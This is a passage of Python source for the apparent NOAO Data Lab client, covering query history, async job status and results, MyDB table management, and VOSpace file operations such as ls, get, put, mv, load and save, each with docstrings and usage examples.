print ("QID = %s not found" % str(queryid))
return
print ("Rerunning QID = %d" % queryid)
v = self.qhistory[queryid]
# qid, type, async_, query, time, jobid, username, format, status/nrows
query = v[3]
print ("Query = '%s'" % query)
# Check type
if qtype not in ['sql','adql']:
print ("Only 'sql' and 'adql' queries are currently supported.")
return
_query = query # local working copy
# Check if the query is in a file
if os.path.exists (_query):
with open (_query, "r", 0) as fd:
_query = fd.read (os.path.getsize(_query)+1)
fd.close()
# What type of query are we doing
sql = None
adql = None
if qtype == 'sql':
sql = _query
else:
adql = _query
# Add the mapping information if not already loaded
if (out is None or out == '') and (self.fmtmapping is None):
addFormatMapping(self)
mapping = self.fmtmapping
# The queryClient "fmt" will depend on the requested output format
if (out is None or out == ''):
try:
qcfmt = mapping[fmt][0]
except:
print ("Format '%s' not supported." % fmt)
return
else:
qcfmt = 'csv'
# Execute the query.
if profile != "default":
if profile != "" and profile is not None:
queryClient.set_profile (profile=profile)
try:
res = queryClient.query (token, adql=adql, sql=sql,
fmt=qcfmt, out=out, async_=async_)
except Exception as e:
if not async_ and str(e) is not None:
err = str(e)
if err.find("Time-out") >= 0:
print ("Error: Sync query timeout, try an async query")
else:
print (str(e))
else:
print (str(e))
else:
# Add this query to the query history
jobid = None
status = ''
if (out is None or out == '') and (not async_): # regular sync query
status = len(res.split('\n'))-2 # number of rows returned
if (out is not None) and (out != '') and (not async_):
status = res # sync query to file, vos, or mydb
if async_:
jobid = res
status = 'SUBMITTED'
if self.qhistory is None:
qid = 1
self.qhistory = {qid : (qid, qtype, async_, _query, time.time(), jobid, getUserName(self), fmt, status)}
else:
qid = int(max(self.qhistory.keys())) + 1
self.qhistory[qid] = (qid, qtype, async_, _query, time.time(), jobid, getUserName(self), fmt, status)
# Return the results
# Asynchronous
if async_:
print ("Asynchronous query JobID = %s " % res) # Return the JobID
return res
# Synchronous
elif out == '' or out is None:
# Convert to the desired format
return reformatQueryOutput(self,res,fmt,verbose=verbose)
def queryhistory(self, async_=None, **kw):
'''
Report the history of queries made so far.
Parameters
----------
async : bool
A boolean (True/False) of whether to only show the ASYNC queries.
By default all queries are shown.
``async_`` replaces the previous ``async`` parameter, because ``async``
was promoted to a keyword in Python 3.7. Users of Python versions
prior to 3.7 can continue to use the ``async`` keyword.
Results
-------
The information on part queries is output to the screen with the following
columns: query ID, submission time, query type (sql/adql), sync or async query, jobid (for async queries),
output format, status of query (or number of returned rows if sync query), query string
Examples
--------
Perform some queries and then list the history.
.. code-block:: python
data1 = dl.query('select ra,dec from smash_dr1.source limit 100',fmt='csv')
Returning CSV formatted table as a string
data2 = dl.query('select ra,dec from smash_dr1.source limit 500',fmt='pandas')
Returning Pandas dataframe
data3 = dl.query('select ra,dec from smash_dr1.source limit 1000',fmt='structarray')
Returning Numpy structured / record array
dl.queryhistory()
1 2017-05-16 13:27:34 sql SYNC pandas 100 -- 'select ra,dec,gmag from smash_dr1.object limit 100'
2 2017-05-16 13:27:40 sql SYNC csv 500 -- 'select ra,dec,gmag from smash_dr1.object limit 500'
3 2017-05-16 13:27:46 sql SYNC structarray 1000 -- 'select ra,dec,gmag from smash_dr1.object limit 1000'
'''
# Process optional keyword arguments.
if 'async' in kw:
async_ = kw['async']
if self.qhistory is None:
print ("No queries made so far")
return
else:
keys = sorted(self.qhistory.keys())
# Only async request, make sure we have some
if async_ is True:
asyncv = []
for k in keys:
v = self.qhistory[k]
asyncv.append(v[2])
if sum(asyncv) == 0:
print ("No ASYNC queries made so far")
return
# Loop through the query history
print ("-------------------------------------------------------------------------------------------------------------------")
print ("QID DATE Type A/SYNC Format Status JobID Query")
print ("-------------------------------------------------------------------------------------------------------------------")
for k in keys:
# qid, type, async_, query, time, jobid, username, format, status/nrows
v = list(self.qhistory[k]) # convert to list
# Get the query status for ASYNC queries
if v[2] is True:
jobid = v[5]
token = getUserToken(self)
stat = queryClient.status(token, jobId=jobid)
v[8] = stat
if (async_ is True and v[2] == True) or (async_ is not True):
print ("%-3d %-19s %-4s %-5s %-11s %-10s %-18s '%-s'" %
(v[0], time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(v[4])),
v[1], 'ASYNC' if v[2] else 'SYNC', v[7],
str(v[8]), v[5] if v[2] else "--", ' '.join(v[3].split())))
print ("-------------------------------------------------------------------------------------------------------------------")
# Maybe leave off the jobid if we are using QID instead??!!
def querystatus(self, jobid=None):
'''
Get the async query job status.
Parameters
----------
jobid : str
This can be either (1) the Query ID (QID) returned by the dl.queryhistory() command, or
(2) the unique job identifier for the asynchronous query which was returned by :func:`ql.query`
when the query job was submitted.
Returns
-------
status : str
The status of the query, which can be one of the following:
``QUEUED`` the query job is in queue and waiting to be executed.
``EXECUTING`` the query job is currently running.
``COMPLETED`` the query is done and the results are ready to be retrieved with :func:`dl.queryresults()`.
``ERROR`` there was a problem with the query.
Example
-------
Submit an asynchronous query and then check the status.
.. code-block:: python
jobid = dl.query('SELECT ra,dec from smash_dr1.source LIMIT 100',async_=True)
Asynchronous query JobID = uqrcs8a5n8s6d0je
dl.querystatus(jobid)
COMPLETED
'''
# Not enough information input
if (jobid is None):
print ("Syntax - dl.querystatus(jobId/QID)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Was a QID or JobId input?
_jobid = jobid # assume a jobid was input
# QID was input
if (type(jobid) is int) or (type(jobid) is str and jobid.isdigit() is True):
keys = sorted(self.qhistory.keys())
if ((int(jobid) in keys) is False): # no QID
print ("QID = %s not found" % str(jobid))
return
v = self.qhistory[int(jobid)]
# qid, type, async_, query, time, jobid, username, format, status/nrows
if v[2] is False: # not an async query
print ("QID = %s is not an ASYNC query" % str(jobid))
return
_jobid = v[5]
# Get the status
print (queryClient.status (token, jobId=_jobid))
def queryresults(self, jobid=None):
'''
Get the async query results.
Parameters
----------
jobid : str
This can be either (1) the Query ID (QID) returned by the dl.queryhistory() command, or
(2) the unique job identifier for the asynchronous query which was returned by :func:`ql.query`
when the query job was submitted.
Returns
-------
result : str
The result of the query in the requested format (see ``fmt`` in :func:`dl.query`.
Example
-------
Submit an asynchronous query and then check the status.
.. code-block:: python
jobid = dl.query('SELECT ra,dec from smash_dr1.source LIMIT 3',async_=True)
Asynchronous query JobID = uqrcs8a5n8s6d0je
dl.querystatus(jobid)
COMPLETED
results = dl.queryresults(jobid)
print results
ra,dec
103.068354922718,-37.973538878907299
103.071774116284,-37.973599429479599
103.071597827998,-37.972329108796401
'''
# Not enough information input
if (jobid is None):
print ("Syntax - dl.queryresults(jobId/QID)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Was a QID or JobId input?
_jobid = jobid # assume a jobid was input
# QID was input
if (type(jobid) is int) or (type(jobid) is str and jobid.isdigit() is True):
keys = sorted(self.qhistory.keys())
if ((int(jobid) in keys) is False): # no QID
print ("QID = %s not found" % str(jobid))
return
v = self.qhistory[int(jobid)]
# qid, type, async_, query, time, jobid, username, format, status/nrows
if v[2] is False: # not an async query
print ("QID = %s is not an ASYNC query" % str(jobid))
return
_jobid = v[5]
fmt = v[7]
# JobID input, get the output format
else:
keys = sorted(self.qhistory.keys())
for k in keys:
v = self.qhistory[k]
# qid, type, async_, query, time, jobid, username, format, status/nrows
if v[5] == jobid:
fmt = v[7]
break
# Check first if the job has been completed
stat = queryClient.status (token, jobId=_jobid)
if stat != 'COMPLETED':
print ("The job has not yet completed")
return
# Get the results
res = (queryClient.results (token, jobId=_jobid))
# Convert to the desired format
return reformatQueryOutput(self,res,fmt,verbose=True)
def listdb(self, table=''):
'''
List the user's MyDB tables.
Parameters
----------
table : str
The name of a specific table in mydb. If this is blank then all tables will be listed.
Returns
-------
list : str
The list of properties of ``table`` or all tables in mydb.
Example
-------
List the MyDB tables.
.. code-block:: python
print dl.listmydb()
table
table2
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
try:
res = queryClient.list (token, table=table)
except Exception as e:
print ("Error listing MyDB tables.")
print (str(e))
else:
if res == 'relation "" not known':
print ("No tables in MyDB")
res = ''
else:
res = ' '.join(res.splitlines()) # convert to space separated list
return res
def droptable(self, table=None):
'''
Drop a user's MyDB table.
Parameters
----------
table : str
The name of a specific table in mydb to drop.
Returns
-------
list : str
The list of properties of ``table`` or all tables in mydb.
Example
-------
Drop the MyDB table called ``table``.
.. code-block:: python
print dl.listdb()
table
table2
dl.droptable('table')
table
table2
print dl.listdb()
table2
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
try:
queryClient.drop (token, table=table)
except Exception as e:
print ("Error dropping table '%s'." % table)
print (str(e))
else:
print ("Table '%s' was dropped." % table)
def exporttable(self, table=None, name=None, fmt=None):
'''
Copy a user's MyDB table to a file in VOSpace.
Parameters
----------
table : str
The name of a specific table in mydb to drop.
name : str
The file name to save the table to.
fmt : str
The output file format. The available formats are 'csv', 'fits' and 'hdf5'.
If this is not specified then the file extension is used to identify the
format type.
Example
-------
Export the MyDB table called ``table`` to file ``test.csv``.
.. code-block:: python
dl.exporttable('table','test.csv')
'''
# Not enough information input
if (table is None or name is None):
print ("Syntax - dl.exporttable(table,name,fmt)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
if not name.startswith('vos://'): name = ("vos://" + name)
# Check if the table exists
res = queryClient.list (token, table='')
if table not in res.splitlines():
print ("Table '%s' not found." % table)
return
# Check if the file exists already
res = storeClient.ls(token,name,'csv')
if res != '':
print ("'%s' already exists." % name)
return
# Figure out the format type
if fmt is None:
fbase, fext = os.path.splitext(name)
fmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv' }
try:
fmt = fmtmap[fext]
except:
print ("Format '%s' not supported. Using 'csv' instead." % fmt)
fmt = 'csv'
# Make sure the fmt is supported
if fmt not in ['fits','hdf5','csv']:
print ("Format '%s' not supported." % fmt)
return
# Make the MyDB query and output to VOSpace
try:
res = queryClient.query (token, sql='select * from mydb://'+table,out=name,fmt=fmt)
except Exception as e:
print ("Error exorting table '%s'." % table)
print (str(e))
else:
print ("Table '%s' was copied to '%s'." % (table, name))
def queryprofiles(self, profile=None):
'''
List the available Query Manager profiles to use with a :func:`dl.query`.
Parameters
----------
profile : str
The name of a specific Query Manager profile to check. If this is blank
then all of the available profile names will be listed.
Returns
-------
results : str
The list of properties of profile ``profile``, or a list of all available profiles.
Example
-------
List of available profiles.
.. code-block:: python
dl.queryprofiles()
default,IRSA,HEASARC,Vizier,GAVO,SIMBAD,zeus1,SDSS-DR9,STScI-RegTAP,GALEX-DR6,dldb1
Get profile information on profile ``dldb1``.
dl.queryprofiles('dldb1')
{u'accessURL': u'http://dldb1.sdm.noao.edu:8080/ivoa-dal/tap', u'dbport': 5432, u'password':
u'<PASSWORD>', u'description': u'Development NOAO Data Lab TAP Service / Database on dldb1',
u'database': u'tapdb', u'host': u'dldb1.sdm.noao.edu', u'vosRoot': u'vos://datalab.noao!vospace',
u'vosEndpoint': u'http://dldb1.sdm.noao.edu:8080/vospace-2.0/vospace', u'user': u'dlquery',
u'vosRootDir': u'/data/vospace/users', u'type': u'datalab'}
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
print (queryClient.list_profiles (token, profile=profile))
def schema(self, val='', fmt='text', profile='default'):
'''
Print information about data service schema.
Parameters
----------
val : str
Value to list ([[<schema>][.<table>][.<col>]]).
fmt: str
Output format (csv|text|json).
profile : str
Service profile.
Returns
-------
results : str
The schema information is printed to the screen.
Example
-------
Print out all the DL tables.
.. code-block:: python
datalab schema
Schema Name Description
----------- -----------
gaia_dr1 GAIA Data Release 1
ivoa IVOA ObsCore tables
des_sva1 DES SVA1 Data Products
tap_schema TAP Schema Tables
usno USNO Astrometry Catalogs
sdss_dr13
neo_dr1 NEO Survey Data Release 1
ls_dr3 The DECam Legacy Survey Data Release 3
smash_dr1 SMASH Data Release 1
List all tables in a schema/catalog.
.. code-block:: python
datalab schema val=smash_dr1
Schema: smash_dr1
Table Name Description
---------- -----------
chip Info on each chip in the frame
exposure Info on each exposure
field Info on each target field (position, Num exposures, etc)
object Average photometry of each unique object
source All of the individual source measurements
stars View of object table to select for stars
galaxies View of object table to select for galaxies
xmatch Crossmatch of object against GAIA DR1 and WISE
'''
print (queryClient.schema (value=val, format=fmt, profile=profile))
################################################
# Storage Manager Tasks
################################################
def ls(self, name='vos://', format='csv', verbose=False):
'''
List files in VOSpace.
Parameters
----------
name : str
The name of a specific file to list. If name is blank then all files will be listed.
format : str
The format to use.
verbose: bool
Give more verbose output, or just a list of files. The default is verbose=True.
Returns
-------
results : str
The list of files in VOSpace.
Example
-------
List the files.
.. code-block:: python
dl.ls()
test2 test1
Verbose listing of the files in the ``public/`` directory.
.. code-block:: python
dl.ls('public',verbose=True)
lrw-rw---- demo15 0B 17 May 2017 14:04:25 thisisalsoalink -> /public/smash2
lrw-rw---- demo15 0B 17 May 2017 13:58:04 thisisalink -> /smash1
-rw-rw-r-- demo15 3.4K 17 May 2017 09:40:13 smash2
-rw-rw-r-- demo15 3.4K 17 May 2017 07:34:54 smash1
drw-rw---- demo15 0B 17 May 2017 14:05:02 data/ tableingester,downloader,runner
'''
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Trim trailing / or /*, messes up directory listing
if name != 'vos://':
name = (name if not name.endswith('/') else name[:-1])
name = (name if not name.endswith('/*') else name[:-2])
# Run the LS command
res = storeClient.ls (token, name=name, format='raw')
root = ET.fromstring('<data>'+res+'</data>')
pathbase = 'vos://datalab.noao!vospace/'+getUserName(self)+'/'
# Check if this is a directory listing
if (len(root) == 1) and (root[0].attrib['{http://www.w3.org/2001/XMLSchema-instance}type'] == 'vos:ContainerNode'):
pathbase = root[0].attrib['uri']+'/'
for k in root[0]:
if (k.tag.endswith('nodes') is True):
root = k # make the "nodes" the new root
break
lenpathbase = len(pathbase)
if verbose is False: # start output string list
flist = []
# Loop over nodes
user = getUserName(self)
for node in root:
# Gather up all the necessary information for this node
vals = getNodeInfo(self, node, lenpathbase, verbose=verbose)
if verbose is True:
# Now print out the information
print ("%10s %s %6s %s %s %s" % (vals['permissions'], user, vals['size'],
vals['time'], vals['verbosename'], vals['caps']))
else:
# Add trailing "/" for directories
name = (vals['name']+'/' if vals['type']=='vos:ContainerNode' else vals['name'])
flist.append("%s " % name)
if verbose is False:
print (' '.join(flist))
def get(self, source=None, destination=None, verbose=True):
'''
Get one or more files from Data Lab.
Parameters
----------
source : str
The name of the source file on VOSpace, e.g. ``file2.txt``.
destination : str
The name of the local destination file, e.g. ``file1.txt``.
Example
-------
Get a query output table called ``table1_output.txt`` from VOSpace.
.. code-block:: python
dl.get('table1_output.txt','table1_output.txt')
(1/1) [====================] [ 9.1K] table1_output.txt
'''
# Not enough information input
if (source is None) or (destination is None):
print ("Syntax - dl.get(source, destination)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the GET command
storeClient.get (token, source, destination,
verbose=verbose)
def put(self, source=None, destination=None, verbose=True):
'''
Put files into Data Lab VOSpace.
Parameters
----------
source : str
The name of a local file to upload to VOSpace, e.g. ``file1.txt``.
destination : str
The name of the destination file with, e.g. ``file2.txt``. The destination
file can have the vos:// prefix but it is not required.
Example
-------
Put a catalog called ``cat.fits`` into VOSpace.
.. code-block:: python
dl.put('cat.fits','cat.fits')
(1 / 1) cat.fits -> vos://cat.fits
'''
# Not enough information input
if (source is None) or (destination is None):
print ("Syntax - dl.put(source, destination)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the PUT command
res = storeClient.put (token, source, destination,
verbose=verbose)
if res == '[<Response [200]>]': # Return None if nothing to give
res = None
return res
def mv(self, source=None, destination=None, verbose=True):
'''
Move a file in Data Lab VOSpace.
Parameters
----------
source : str
The name the file in VOSpace to move/rename, e.g. ``file1.txt``.
destination : str
The new name of the file in VOSpace (e.g. ``newfile1.txt``) or the
directory to move it to.
Example
-------
Rename the file ``file.txt`` to ``newfile.txt``.
.. code-block:: python
dl.ls()
file.txt
dl.mv('file.txt','newfile.txt')
dl.ls()
newfile.txt
Move the file ``output.fits`` to the ``results/`` directory.
.. code-block:: python
dl.ls()
output.txt, results
dl.mv('output.fits','results/output.fits')
dl.ls()
results/output.txt
'''
# Not enough information input
if (source is None) or (destination is None):
print ("Syntax - dl.mv(source, destination)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Check if the source file actually exist
res = storeClient.ls(token,source,'csv')
if res == '':
print ("'%s' not found" % source)
return
# Run the MV command
storeClient.mv (token, fr=source, to=destination,
verbose=verbose)
def cp(self, source=None, destination=None, verbose=True):
'''
Copy a file in Data Lab VOSpace.
Parameters
----------
source : str
The name of the file in VOSpace to copy, e.g. ``file1.txt``.
destination : str
The new name of the file in VOSpace, e.g. ``newfile1.txt``.
Example
-------
Copy the file ``file.txt`` to ``newfile.txt``.
.. code-block:: python
dl.ls()
file1.txt
dl.cp('file1.txt','newfile.txt')
dl.ls()
file1.txt, newfile.txt
'''
# Not enough information input
if (source is None) or (destination is None):
print ("Syntax - dl.cp(source, destination)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Check if the source file actually exist
res = storeClient.ls(token,source,'csv')
if res == '':
print ("'%s' not found" % source)
return
# Run the CP command
storeClient.cp (token, fr=source, to=destination,
verbose=verbose)
def rm(self, name=None, verbose=True):
'''
Delete files in Data Lab VOSpace.
Parameters
----------
name : str
The name of the file in VOSpace to delete, e.g. ``file1.txt``.
Example
-------
Delete the file ``file1.txt``.
.. code-block:: python
dl.ls()
file1.txt, file2.txt
dl.rm('file1.txt')
dl.ls()
file2.txt
'''
# Not enough information input
if (name is None):
print ("Syntax - dl.rm(name)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the RM command
storeClient.rm (token, name=name, verbose=verbose)
def ln(self, target=None, link=None):
'''
Link a file in Data Lab VOSpace.
Parameters
----------
target : str
The name of the file in VOSpace to link to, e.g. ``file1.txt``.
link : str
The name of the link, e.g. ``file1link``.
Example
-------
Create a link called ``iamlink`` to the file ``file1.txt``.
.. code-block:: python
dl.ls()
file1.txt
dl.ln('file1.txt','iamlink')
dl.ls()
file1.txt, iamlink
'''
# Not enough information input
if (link is None) or (target is None):
print ("Syntax - dl.ln(target, link)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# They require vos:// prefix to work
lnk = (link if link.startswith("vos://") else ("vos://" + link))
trg = (target if target.startswith("vos://") else ("vos://" + target))
# Run the LN command
storeClient.ln (token, fr=lnk, target=trg)
def mkdir(self, name=None):
'''
Create a directory in Data Lab VOSpace.
Parameters
----------
name : str
The name of the directory in VOSpace to create, e.g. ``results``.
Example
-------
Create the directory ``data1/``.
.. code-block:: python
dl.mkdir('data1')
'''
# Not enough information input
if (name is None):
print ("Syntax - dl.mkdir(name)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the MKDIR command
# currently this must have vos:// prefix
if name[0:6] != 'vos://':
name = 'vos://' + name
storeClient.mkdir (token, name=name)
def rmdir(self, name=None):
'''
Delete a directory in Data Lab VOSpace.
Parameters
----------
name : str
The name of the directory in VOSpace to delete, e.g. ``results``.
Example
-------
Delete the directory ``data1/``.
.. code-block:: python
dl.rmdir('data1')
'''
# Not enough information input
if (name is None):
print ("Syntax - dl.rmdir(name)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the RMDIR command
storeClient.rmdir (token, name=name)
def copyurl(self, url=None, name=None):
'''
Copy a file to VOSpace using a URL.
Parameters
----------
url : str
The URL location of the file.
name : str
The name of the file in VOSpace. The vos:// prefix is not necessary.
Example
-------
Copy the file http://www.mywebsite.com/file1.fits to output1.fits in VOSpace.
.. code-block:: python
dl.copyurl('http://www.mywebsite.com/file1.fits','output1.fits')
'''
# Not enough information input
if (url is None or name is None):
print ("Syntax - dl.copyurl(url,name)")
return
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Run the LOAD command
name = (name if name.startswith('vos://') else ('vos://'+name))
storeClient.load(token, name, url)
def load(self, name=None, inpfmt=None, fmt='pandas', ext=None):
'''
Save the string representation of a data object to a file in VOSpace.
Parameters
----------
name : str
The name of the file in load into memory. The vos:// prefix is necessary
otherwise it is assumed a local file that should be read. Currently only
FITS binary tables and CSV file formats are supported.
inpfmt : str
Tne input format type. The currently supported types are FITS binary tables,
HDF5, CSV, and ASCII files ('string'). If this is not specified then the
file extension of ``name`` is used to attempt to figure out the format.
fmt : str
The data type format to output. Permitted values are:
* 'csv' the returned result is a comma-separated string that looks like a
csv file (newlines at the end of every row)
* 'ascii' same as csv but tab-delimited
* 'string' just a straight read of ASCII into a string
* 'array' Numpy array
* 'structarray' Numpy structured / record array
* 'pandas' a Pandas data frame
* 'table' in Astropy Table format
* 'votable' result is a string XML-formatted as a VO table
The output type for a FITS image is a numpy array. For other data 'pandas' is
the default format.
ext : int
The FITS extension to load for images. The default is 1 for a FITS binary
table and 0 for a FITS image.
Example
-------
Load the file "output.fits" into a pandas data frame.
.. code-block:: python
df = dl.load('output.fits',fmt='pandas')
Load a FITS image "im1.fits".
.. code-block:: python
im,head = dl.load('im1.fits')
'''
# Not enough information input
if (name is None):
print ("Syntax - dl.load(name,inpfmt=inpfmt,fmt=fmt,ext=ext)")
return
# Only fits, csv and string input format currently supported
if inpfmt != None and inpfmt != '' and inpfmt not in ['fits','hdf5','csv','string']:
print ("Format '%s' not currently supported for input file." % inpfmt)
return
# Use file extension to figure out input format
if inpfmt is None:
fbase, fext = os.path.splitext(name)
inpfmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv', '.txt':'string' }
try:
inpfmt = inpfmtmap[fext]
except:
print ("Cannot use file extension to determine 'inpfmt'")
return
# Check token if reading from VOSpace
if name.startswith("vos://"):
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Check that the file exists
if name.startswith("vos://"):
res = storeClient.ls(token,name,'csv')
if res == '':
print ("'%s' not found" % name)
return
else:
if os.path.exists(name) is False:
print ("'%s' not found" % name)
return
# Load the neccessary packages
# astropy fits
try:
dum = fits.__doc__
except:
from astropy.io import fits
# astropy Table
try:
dum = Table.__doc__
except:
from astropy.table import Table
# astropy votable
try:
dum = from_table.__doc__
except:
from astropy.io.votable import from_table
# Reading and conversion mapping
# for reading, x=filename; for conversion, x=data object
writemap = { 'fits-csv': (lambda x: Table.read(x,format='fits'), partial(convertTableToFormat,format='ascii.csv')),
'fits-ascii': (lambda x: Table.read(x,format='fits'), partial(convertTableToFormat,format='ascii.tab')),
'fits-array': (lambda x: Table.read(x,format='fits'), lambda x: x.as_array()),
'fits-structarray': (lambda x: Table.read(x,format='fits'), lambda x: x.as_array()),
'fits-pandas': (lambda x: Table.read(x,format='fits'), lambda x: x.to_pandas()),
'fits-table': (lambda x: Table.read(x,format='fits'), lambda x: x),
'fits-votable': (lambda x: Table.read(x,format='fits'), lambda x: from_table(x).resources[0].tables[0]),
'hdf5-csv': (lambda x: Table.read(x,format='hdf5'), partial(convertTableToFormat,format='ascii.csv')),
'hdf5-ascii': (lambda x: Table.read(x,format='hdf5'), partial(convertTableToFormat,format='ascii.tab')),
'hdf5-array': (lambda x: Table.read(x,format='hdf5'), lambda x: x.as_array()),
'hdf5-structarray': (lambda x: Table.read(x,format='hdf5'), lambda x: x.as_array()),
'hdf5-pandas': (lambda x: Table.read(x,format='hdf5'), lambda x: x.to_pandas()),
'hdf5-table': (lambda x: Table.read(x,format='hdf5'), lambda x: x),
'hdf5-votable': (lambda x: Table.read(x,format='hdf5'), lambda x: from_table(x).resources[0].tables[0]),
'csv-csv': (lambda x: readAscii(x), lambda x: x),
'csv-ascii': (lambda x: Table.read(x,format='csv'), partial(convertTableToFormat,format='ascii.tab')),
'csv-array': (partial(np.loadtxt,skiprows=1,delimiter=','), lambda x: x),
'csv-structarray': (lambda x: Table.read(x,format='csv'), lambda x: x.as_array()),
'csv-pandas': (lambda x: Table.read(x,format='ascii.csv'), lambda x: x.to_pandas()),
'csv-table': (lambda x: Table.read(x,format='ascii.csv'), lambda x: x),
'csv-votable': (lambda x: Table.read(x,format='ascii.csv'), lambda x: from_table(x).resources[0].tables[0]),
'string-string': (lambda x: readAscii(x), lambda x: x) }
# Should add HDF5, use Table.read(x,format='hdf5',path='data'), h5py must be installed
# Check that we can do the operation
mapcode = inpfmt+'-'+fmt
if mapcode not in writemap.keys():
print ("Output format '%s' not supported for input type '%s'" % (fmt, inpfmt) )
return
# Open the file
if name.startswith('vos://'):
fh = StringIO( storeClient.get(token,name,'',verbose=False) )
else:
fh = open(name,'rb')
# If this is a FITS file, check if its a binary table or image
if inpfmt == 'fits':
fitstable = False
hd = fits.getheader(fh)
fh.seek(0) # reset to beginning of file
if hd['EXTEND'] is True:
try:
tryext = (1 if ext is None else ext)
hd1 = fits.getheader(fh,tryext)
if hd1['XTENSION'] == 'BINTABLE': fitstable=True
except:
pass
fh.seek(0) # reset to beginning of file
# Load a Fits image file
if inpfmt == 'fits' and fitstable is False:
try:
if ext is None: ext=0
return fits.getdata(fh,ext,header=True)
except Exception as e:
print ("There was an error loading the FITS image '%s'" % name)
print (str(e))
return
# Step 1) Read the file
try:
rdata = writemap[mapcode][0](fh)
except Exception as e:
print ("Error reading file")
print (str(e))
return
# Step 2) Convert to output format
try:
return writemap[mapcode][1](rdata)
except Exception as e:
print ("Error converting data")
print (str(e))
return
def save(self, data=None, name=None, fmt=None, clobber=False):
'''
Save the string representation of a data object to a file in VOSpace.
Parameters
----------
data : str
The data object such as a pandas data frame or numpy structured array.
name : str
The name of the file in VOSpace to create. The vos:// prefix is not
necessary.
fmt : str
The format to use for the output file. If this is not specified then the
file extension of ``name`` is used to attempt to figure out the format.
The currently supported input and output formats are:
Data type Format
csv csv
ascii ascii
array csv/fits
structarray csv/fits
pandas csv/fits/hdf5
table csv/fits/hdf5
votable csv/fits/hdf5
clobber : bool
Whether to overwrite an existing file. The default is False.
Example
-------
Save the pandas data frame called "df" to a file called "data1.csv" in VOSpace.
.. code-block:: python
dl.save(df,'data1.csv')
'''
# Not enough information input
if (data is None or name is None):
print ("Syntax - dl.save(data,name,fmt=fmt,clobber=clobber)")
return
# If fmt is None then try to guess format from the output filename extension
if fmt is None:
fbase, fext = os.path.splitext(name)
fmtmap = { '.fits':'fits', '.hdf5':'hdf5', '.csv':'csv', '.xml':'xml' }
try:
fmt = fmtmap[fext]
except:
print ("Cannot use file extension to determine 'fmt'")
return
# Input data object types
# -'csv', type='str', ',' delimited
# -'ascii', type='str', '\t' delimited
# -'array' numpy array, type='numpy.ndarray', data.dtype = dtype('float64'), data.shape=(1000,39), len(data.shape)=2, data.dtype.names=None
# -'structarray' numpy structured array, type='numpy.ndarray', data.dtype = all columns, data.shape=(1000,), len(data.shape)=1
# -'pandas' data frame, type='pandas.core.frame.DataFrame'
# -'table' astropy table, type='astropy.table.table.Table'
# -'votable', astropy VOtable, type='astropy.io.votable.tree.Table'
inptypemap = {'str':'csv', 'numpy.ndarray':'numpy','pandas.core.frame.DataFrame':'pandas',
'astropy.table.table.Table':'table', 'astropy.io.votable.tree.Table':'votable'}
datatype = str(type(data)).split("'")[1] # "<type 'numpy.ndarray'>"
try:
inptype = inptypemap[datatype]
except:
print ("Data object type %s not supported." % datatype)
# Discern 'csv' vs. 'ascii'
if (inptype == 'csv'):
if len(data[0:5000].split('\t')) > len(data[0:5000].split(',')): inptype='ascii'
# Discern 'array' vs. 'structarray'
if (inptype == 'numpy'):
inptype = 'array' # default
if len(data.shape) == 1: inptype='structarray'
# Import the modules if necessary
# astropy fits
try:
dum = fits.__doc__
except:
from astropy.io import fits
# astropy Table
try:
dum = Table.__doc__
except:
from astropy.table import Table
# astropy votable
try:
dum = writeo.__doc__
except:
from astropy.io.votable import from_table, writeto
# Check token if writing to VOSpace
if name.startswith("vos://"):
# Check if we are logged in
if not checkLogin(self):
return
token = getUserToken(self)
# Check that we have a good token
if not authClient.isValidToken(token):
raise Exception ("Invalid user name and/or password provided. Please try again.")
# Check if the file exists already
if name.startswith("vos://"):
res = storeClient.ls(token,name,'csv')
if res != '':
if clobber is False:
print ("'%s' already exists." % name)
return
else:
storeClient.rm(token,name) # clobber it
else:
if os.path.exists(name) is True:
if clobber is False:
print ("'%s' already exists." % name)
return
else:
os.remove(name) # clobber it
# What local file are we writing to
# 1) local file, use name
# 2) vos:// file, use temporary filename
outname = name
if name.startswith("vos://"):
tfd = tempfile.NamedTemporaryFile()
outname = tfd.name
tfd.close()
# Output formats supported
# -'csv', (1) csv
